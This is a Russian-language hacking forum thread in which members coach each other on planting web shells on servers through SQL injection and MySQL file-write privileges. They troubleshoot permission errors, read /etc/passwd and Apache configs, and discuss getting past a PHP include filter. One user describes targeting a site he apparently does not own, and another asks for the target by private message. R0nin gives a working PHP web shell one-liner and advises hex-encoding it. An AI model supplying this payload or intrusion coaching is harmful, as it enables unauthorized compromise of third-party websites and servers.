Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Сейчас, специаьлно для тебя запустил apache & mysql, и специально написал php скрипт, через которй вводил комманды sql, при попытке создать файл в www выдает ошибку:
    Code:
    Can't create/write to file '/var/www/hello.txt' (Errcode: 13)
    И где бред??


    Это естественно.
     
    #19521 R0nin, 2 Mar 2012
    Last edited: 2 Mar 2012
  2. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    Бред в том, что ты делаешь неправильный вывод. Права на каждом сервере могут быть разные и это основное. Ты кстати только что себе противоречишь.
     
  3. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Где я написал, что все серверы имеют одинаково настроенные права? Говорю, что если сервер нормально настроенный то у него не будут права записать файл, если на сервере нету директории с 777, в чем я сильно сомневаюсь.
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    а вот такой вопрос, хотел залить шелл,
    а мне пишет

    чё ет значит? типа нету прав на папке 777??
     
  5. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Да, ты прав.
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    error code 2 = неправильный файл / директория

    нехватка прав это error code 13
     
    _________________________
    1 person likes this.
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    блин, а что я таогда могу делать неправильно??
    захожу через phpmyadmin под root, все права, все БД
    нашол среди сайтов на серваке сайт где в ошибке есть полный путь
    выполняю запрос

    и выскакивает ета ошибка, где я мог ошибится?
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    ты уверен что бд и сайт на одном серваке?

    ...
     
    _________________________
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    мм.. точно, не на одном, блин, как тогда узнать полный путь?

    я кроче попытался загрузить
    etc/passwd

    мне выдало такое
    at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bi...

    я так понимаю там должно быть продолжение?, потом мне посоветовали посмотреть через конфинг апача

    /etc/apache2/httpd.conf

    выдал такое
    230a23202f6574632f617061636865322f68747470642e636f6e66200a230a23205468697320697320746865206d61696e202e2e2e

    можно ли както от етого добится инфы о полном пути?
     
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Сайт в личку кидай.
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886

    может быть получится узнать полный путь, но полный путь до чего? может это отдельный серв для базы, и там нету http сервера, может там нету интерпретатора php, или сайтов нету.. зачем тебе голый серв? посмотри к какому хосту подключен твой юзер mysql, и поищи сайты на этом ip (bing.com)
     
    _________________________
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    Полгый путь к файлам для заливки шелла, так как етим можно вопользоватся?

    кинул
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    qaz, рекомендую читать книги по web, чтобы представить как работают службы, протоколы и прочее.

    я же обяснил, если там не будет http servera то "путь к файлам" который вы имеете ввиду папки под веб (Public docs) такого существовать не будет. то есть через браузер открыть залитый шелл невозможно будет
     
    _________________________
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    я согласен, подскажите с чего лутше начать изучать ети службы и тп. так как особого поняти не имею как даже их в гугле обозвать
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    да хоть с этой книги

    и еще не повредит тебе книга от фленова "Linux Глазами хакера", наверное его самая нормальная работа

    + найди сам книжку по LAMP на любителя
     
    _________________________
    #19535 Konqi, 2 Mar 2012
    Last edited: 2 Mar 2012
    1 person likes this.
  16. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    есть фильтр от инклуда такой
    PHP:
    ...
    preg_replace('/\.+\//'''$include);
    ...
    на виндовсе все понятно там слешы в другую сторону, можно как то на линксе выйти из за пределы папки чтобы провести инклуд ?
     
  17. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    нет.
     
    #19537 R0nin, 3 Mar 2012
    Last edited: 3 Mar 2012
    2 people like this.
  18. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    22
    Likes Received:
    7
    Reputations:
    0
    Есть инъекция на сайте, file_priv = Y, mg = off. Нашел папку с правами на запись.
    Вот так:
    Вот так работает, а вот так нет :(
    В чем может быть проблема ?
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    trololoman96

    Хм, если код такого вида

    $include = preg_replace('/\.+\//', '', $include);
    include($include);
    то ничего не сделать, но ты запостил preg_replace('/\.+\//', '', $include);
    если код такого вида
    preg_replace('/\.+\//', '', $include);
    include($include);
    то фильтрация работать не будет, точнее функция работать, но переменную не меняет, возвращает отфильтрованный результат, с которым по идее надо работать.
     
    _________________________
  20. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Проблема может быть в одинарных кавычках.
    <?php eval($_REQUEST[cmd]); ?>
    Переведите в hex.

    /tmp надеюсь не та папка с правами на запись, которую вы нашли. Сервер вам не позволит оттуда запускать скрипты.
     
Loading...
Thread Status:
Not open for further replies.